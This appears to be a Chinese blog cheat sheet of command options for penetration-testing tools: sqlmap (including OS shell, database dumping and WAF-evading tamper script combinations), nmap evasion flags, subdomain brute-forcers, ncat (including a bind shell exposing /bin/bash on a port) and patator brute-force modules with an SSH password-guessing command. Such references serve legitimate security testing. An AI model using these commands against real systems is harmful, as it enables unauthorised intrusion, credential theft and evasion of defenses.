命令速查【sqlmap,nmap,sublist3r,subDomainsBrute,wydomain,ncat,patator】

sqlmap

-d                               //直接连接数据库
-u URL, --url=URL                //跟目标的url
-l                               //从Burp或者代理软件的日志文件中解析目标
-m                               //从文件中扫描多个目标 
-g                               //搜索中的结果作为目标地址 
--method=METHOD                  //使用所给的方法连接目标 
--data=DATA                      //填写要用post 提交的数据 
--headers=HEADERS                //添加更加复杂的头
--threads=THREADS                //大使用线程数
-p                               //可测试的变量
--tamper=TAMPER                  //用给出的脚本对注入数据进行混淆
--time-sec=TIMESEC               //设置延迟注入的时间
--union-char=UCHAR               //设定暴力破解列数的字段
--dns-domain=DNS                 //DNS溢出攻击所用域名
--hostname                       //检索DBMS服务器的主机 名称
--users,--passwords,--privileges //枚举DBMS用户,用户密码的哈希值,用户的权限
--dbs,--tables,--columns,--dump  //枚举DBMS数据库,DBMS数据库的表,DBMS数据库的字段,结果导出
--dump-all                       //下载所有的表
-D,-T,-C                         //使用哪个数据库,哪个表,哪个字段
--file-dest=DFILE                //使用绝对路径写入文件
--os-cmd=OSCMD                   //运行系统命 令行
--os-shell                       //运行shell
--os-smbrelay                    // 一键进行smb注入
--os-bof                         // 溢出攻击(SQL server)
--priv-esc                       //用户特权提升
--mobileImitate                  //模仿手机的HTTP头
--smart                          //智能判断注入
--identify-waf                   //对WAF之类的进行检测测试
apostrophemask.py        用UTF-8全角字符替换单引号字符
apostrophenullencode.py        用非法双字节unicode字符替换单引号字符
appendnullbyte.py        在payload末尾添加空字符编码
base64encode.py        对给定的payload全部字符使用Base64编码
between.py        分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
bluecoat.py        在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
chardoubleencode.py        对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
charencode.py        对给定的payload全部字符使用URL编码(不处理已经编码的字符)
charunicodeencode.py        对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
concat2concatws.py        用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py        用“LIKE”运算符替换全部等于号“=”
greatest.py        用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py        在每个关键字之前添加MySQL注释
ifnull2ifisnull.py        用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py        用小写值替换每个关键字字符
modsecurityversioned.py        用注释包围完整的查询
modsecurityzeroversioned.py        用当中带有数字零的注释包围完整的查询
multiplespaces.py        在SQL关键字周围添加多个空格
nonrecursivereplacement.py        用representations替换预定义SQL关键字,适用于过滤器
overlongutf8.py        转换给定的payload当中的所有字符
percentage.py        在每个字符之前添加一个百分号
randomcase.py        随机转换每个关键字字符的大小写
randomcomments.py        向SQL关键字中插入随机注释
securesphere.py        添加经过特殊构造的字符串
sp_password.py        向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py        用“/**/”替换空格符
space2dash.py        用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
space2hash.py        用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py        用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py        用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py        用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py        用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py        用破折号注释符“--”其次是一个换行符替换空格符
space2plus.py        用加号“+”替换空格符
space2randomblank.py        用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py        用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py        用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py        添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py        用MySQL注释包围每个非函数关键字
versionedmorekeywords.py        用MySQL注释包围每个关键字
xforwardedfor.py        添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

普通tamper搭配方式:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MSSQL的搭配方式:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MySql的搭配方式:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

nmap

//Nmap支持主机名,ip,网段的表示方式例如:blah.highon.coffee, namp.org/24, 192.168.0.1;10.0.0-25.1-254
-sL                     仅仅是显示,扫描的IP数目,不会进行任何扫描
-sn                     ping扫描,即主机发现
-Pn                     不检测主机存活
-PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping发现
-PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包发现主机
-PO[prococol list]      使用IP协议包探测对方主机是否开启   
-n/-R                   不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
-sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
-sU                             UDP扫描
-sN/sF/sX                       TCP NullFINand Xmas扫描
--scanflags                     自定义TCP包中的flags
-sI zombie host[:probeport]     Idlescan
-sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描
-sO                             使用IP protocol 扫描确定目标机支持的协议类型
-b “FTP relay host”             使用FTP bounce scan
-p                      特定的端口 -p80,443 或者 -p1-65535
-p U:PORT               扫描udp的某个端口, -p U:53
-F                      快速扫描模式,比默认的扫描端口还少
-r                      不随机扫描端口,默认是随机扫描的
-f; --mtu value                 指定使用分片、指定数据包的MTU.
-D decoy1,decoy2,ME             使用诱饵隐蔽扫描
-S IP-ADDRESS                   源地址欺骗
-e interface                    使用指定的接口
-g/ --source-port PROTNUM       使用指定源端口  
--proxies url1,[url2],...       使用HTTP或者SOCKS4的代理 

--data-length NUM               填充随机数据让数据包长度达到NUM
--ip-options OPTIONS            使用指定的IP选项来发送数据包
--ttl VALUE                     设置IP time-to-live域
--spoof-mac ADDR/PREFIX/VEBDOR  MAC地址伪装
--badsum                        使用错误的checksum来发送数据包
-oN                     将标准输出直接写入指定的文件
-oX                     输出xml文件
--script=
auth: 负责处理鉴权证书(绕开鉴权)的脚本
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式,针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源,例如进行whois解析
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反,属于安全性脚本
version: 负责增强服务与版本扫描(Version Detection)功能的脚本
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

sublist3r

//pentestbox中

-d //接url
-b //使用 subbrute模块
-p //使用特定TCP端口
-v //实时显示
-t //线程数量
-O //输出到

subDomainsBrute

//进入文件目录下
python subDomainsBrute.py --full xxx.cn

-f         //添加字典
--full     //全体扫描
-t         //线程
-o         //输出文件

wydomain

//进入文件目录下
python dnsburte.py -d xxx.cn
-t       //线程数
-d       //接url
-f       //字典名称
-o       //最终结果的名字(就在当前目录下,result目录下各个接口结果)

ncat

#端口扫描#
$nc -z -v -n 172.31.100.7 21-25  //打印21到25 所有开放的端口的banner,默认是TCP,-u参数调整为udp
//-z连接成功后立即关闭连接, 不进行数据交换
//-v详细输出
//-n 不要使用DNS反向查询IP地址的域名
$ nc -v 172.31.100.7 21          //连接开放端口21并且打印运行在这个端口上服务的banner
#聊天#
//Server
$nc -l 1567                      //netcat 命令在1567端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。
//Client
$nc 172.31.100.7 1567            //不管你在机器B上键入什么都会出现在机器A上。
#文件传输#
//Server
$nc -l 1567 > file.txt           //> 表示接受到file.txt
//Client
nc 172.31.100.23 1567 < file.txt //< 表示传输file.txt
#反弹shell#
$ ncat -l 10000 -e /bin/bash     //-e 标志将一个 bash 与端口 10000 相连
#端口转发#
$ ncat -u -l 80-c 'ncat -u -l 8080' //-c 连接到 80 端口的连接都会转发到 8080 端口

patator

  + ftp_login     : 暴力破解FTP
  +ssh_login     : 暴力破解 SSH
  +telnet_login  : 暴力破解 Telnet
  +smtp_login    : 暴力破解 SMTP
  +smtp_vrfy     : 使用SMTP VRFY进行枚举
  +smtp_rcpt     : 使用 SMTP RCPTTO枚举合法用户
  +finger_lookup : 使用Finger枚举合法用户
  +http_fuzz     : 暴力破解 HTTP
  +ajp_fuzz      : 暴力破解 AJP
  +pop_login     : 暴力破解 POP3
  +pop_passd     : 暴力破解 poppassd(http://netwinsite.com/poppassd/)
  +imap_login    : 暴力破解 IMAP4
  +ldap_login    : 暴力破解 LDAP
  +smb_login     : 暴力破解 SMB
  +smb_lookupsid : 暴力破解 SMB SID-lookup
  +rlogin_login  : 暴力破解 rlogin
  +vmauthd_login : 暴力破解 VMware Authentication Daemon
  +mssql_login   : 暴力破解 MSSQL
  +oracle_login  : 暴力破解 Oracle
  +mysql_login   : 暴力破解 MySQL
  +mysql_query   : 暴力破解 MySQLqueries
  +rdp_login     : 暴力破解 RDP(NLA)
  +pgsql_login   : 暴力破解PostgreSQL
  +vnc_login     : 暴力破解 VNC
  +dns_forward   : 正向DNS 查询
  +dns_reverse   : 反向 DNS 查询
  +snmp_login    : 暴力破解 SNMPv1/2/3
  +ike_enum      : 枚举 IKE 传输
  +unzip_pass    : 暴力破解 ZIP加密文件
  +keystore_pass : 暴力破解Java keystore files的密码
  +sqlcipher_pass : 暴力破解加密数据库SQL Cipher的密码-
  +umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  +tcp_fuzz      : Fuzz TCP services
  +dummy_test    : 测试模块
//help查询
python patator.py ssh_login --help
//爆破ssh
python patator.py ssh_login host=xxx.xxx.xxx.xxx user=FILE1 1=/root/user.txt password=FILE0 0=/root/newpass.txt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值